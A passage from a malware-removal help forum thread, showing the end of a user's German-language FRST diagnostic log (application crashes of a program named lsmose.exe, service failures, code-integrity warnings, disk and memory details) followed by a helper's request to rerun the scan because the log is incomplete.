dann sollte der Netzwerkadministrator überprüfen, dass kein Netzwerkproblem besteht und dass eine Verbindung mit dem Server hergestellt werden kann.
 - diese sich auf einem Wechseldatenträger, wie z. B. einer Diskette oder einer CD, befindet, überprüfen Sie, ob der Datenträger richtig in den Computer eingelegt ist.
3. Überprüfen und reparieren Sie das Dateisystem, indem Sie CHKDSK ausführen. Klicken Sie dazu im Menü "Start" auf "Ausführen", geben Sie CMD ein, und klicken Sie auf "OK". Geben Sie an der Eingabeaufforderung CHKDSK /F ein, und drücken Sie die EINGABETASTE.
4. Stellen Sie die Datei von einer Sicherungskopie wieder her, wenn das Problem weiterhin besteht.
5. Überprüfen Sie, ob andere Dateien auf demselben Datenträger geöffnet werden können. Falls dies nicht möglich ist, ist der Datenträger eventuell beschädigt.
Wenden Sie sich an den Administrator oder den Hersteller der Computerhardware, um weitere Unterstützung zu erhalten, wenn es sich um eine Festplatte handelt.

Zusätzliche Daten
Fehlerwert: 3F3717DE
Datenträgertyp: 0

Error: (08/27/2017 08:08:30 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Name des fehlerhaften Moduls: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Ausnahmecode: 0xc000001d
Fehleroffset: 0x00000000000117de
ID des fehlerhaften Prozesses: 0xb60
Startzeit der fehlerhaften Anwendung: 0x01d31f5f7bae7478
Pfad der fehlerhaften Anwendung: c:\windows\debug\lsmose.exe
Pfad des fehlerhaften Moduls: c:\windows\debug\lsmose.exe
Berichtskennung: bad57a24-8b52-11e7-96df-005056c00008

Error: (08/27/2017 01:48:35 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Aus einem der folgenden Gründe kann nicht auf die Datei "" zugegriffen werden:
Es besteht ein Problem mit der Netzwerkverbindung, dem Datenträger mit der gespeicherten Datei bzw. den auf dem Computer installierten
Speichertreibern, oder der Datenträger fehlt.
Das Programm Mediatek Wireless LAN Card Utility wurde wegen dieses Fehlers geschlossen.

Programm: Mediatek Wireless LAN Card Utility
Datei:

Der Fehlerwert ist im Abschnitt "Zusätzliche Dateien" aufgelistet.
Benutzeraktion
1. Öffnen Sie die Datei erneut.
Diese Situation ist eventuell ein temporäres Problem, das selbstständig behoben wird, wenn das Programm erneut ausgeführt wird.
2.
Wenn Sie weiterhin nicht auf die Datei zugreifen können und
 - diese sich im Netzwerk befindet,
dann sollte der Netzwerkadministrator überprüfen, dass kein Netzwerkproblem besteht und dass eine Verbindung mit dem Server hergestellt werden kann.
 - diese sich auf einem Wechseldatenträger, wie z. B. einer Diskette oder einer CD, befindet, überprüfen Sie, ob der Datenträger richtig in den Computer eingelegt ist.
3. Überprüfen und reparieren Sie das Dateisystem, indem Sie CHKDSK ausführen. Klicken Sie dazu im Menü "Start" auf "Ausführen", geben Sie CMD ein, und klicken Sie auf "OK". Geben Sie an der Eingabeaufforderung CHKDSK /F ein, und drücken Sie die EINGABETASTE.
4. Stellen Sie die Datei von einer Sicherungskopie wieder her, wenn das Problem weiterhin besteht.
5. Überprüfen Sie, ob andere Dateien auf demselben Datenträger geöffnet werden können. Falls dies nicht möglich ist, ist der Datenträger eventuell beschädigt.
Wenden Sie sich an den Administrator oder den Hersteller der Computerhardware, um weitere Unterstützung zu erhalten, wenn es sich um eine Festplatte handelt.

Zusätzliche Daten
Fehlerwert: 3FE517DE
Datenträgertyp: 0

Error: (08/27/2017 01:48:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Name des fehlerhaften Moduls: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Ausnahmecode: 0xc000001d
Fehleroffset: 0x00000000000117de
ID des fehlerhaften Prozesses: 0xba0
Startzeit der fehlerhaften Anwendung: 0x01d31f2a5c1a8321
Pfad der fehlerhaften Anwendung: c:\windows\debug\lsmose.exe
Pfad des fehlerhaften Moduls: c:\windows\debug\lsmose.exe
Berichtskennung: a80368c5-8b1d-11e7-92e5-005056c00008

Systemfehler:
=============
Error: (08/28/2017 08:45:55 PM) (Source: Schannel) (EventID: 4119) (User: NT-AUTORITÄT)
Description: Es wurde eine schwerwiegende Warnung empfangen: 20.

Error: (08/28/2017 08:39:08 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Intel® Management & Security Application User Notification Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (08/28/2017 08:39:07 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "VMware USB Arbitration Service" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (08/28/2017 08:39:07 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "VMware Authorization Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (08/28/2017 08:39:07 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "VMware DHCP Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (08/28/2017 08:39:07 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "VMware NAT Service" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (08/28/2017 08:39:07 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Updater Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (08/28/2017 08:39:07 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Cyberlink RichVideo Service(CRVS)" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (08/28/2017 08:39:07 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "NTI Backup Now 5 Scheduler Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (08/28/2017 08:39:07 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "NTI IScheduleSvc" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

CodeIntegrity:
===================================
  Date: 2017-07-23 08:06:28.583
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-07-23 07:49:56.074
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-07-22 21:03:51.043
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-07-19 17:27:33.622
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-07-18 19:15:24.279
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-06 15:24:21.181
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-04-19 18:55:57.044
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-03-05 12:37:09.010
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-03-05 12:20:40.059
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-02-28 17:09:44.548
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

==================== Speicherinformationen ===========================

Prozessor: Intel® Core™ i5 CPU M 460 @ 2.53GHz
Prozentuale Nutzung des RAM: 50%
Installierter physikalischer RAM: 3764.48 MB
Verfügbarer physikalischer RAM: 1877.1 MB
Summe virtueller Speicher: 7527.15 MB
Verfügbarer virtueller Speicher: 5483.96 MB

==================== Laufwerke ================================

Drive c: (Acer) (Fixed) (Total:451.66 GB) (Free:294.03 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: EF7C6B51)
Partition 1: (Not Active) - (Size=14 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=451.7 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

 



#15 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,670 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:06 AM

Posted 28 August 2017 - 05:37 PM

It seems like the FRST.txt log is incomplete. Can you run FRST again? After that, you can attach both logs (FRST.txt and Addition.txt) instead of copy/pasting them if you wish.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users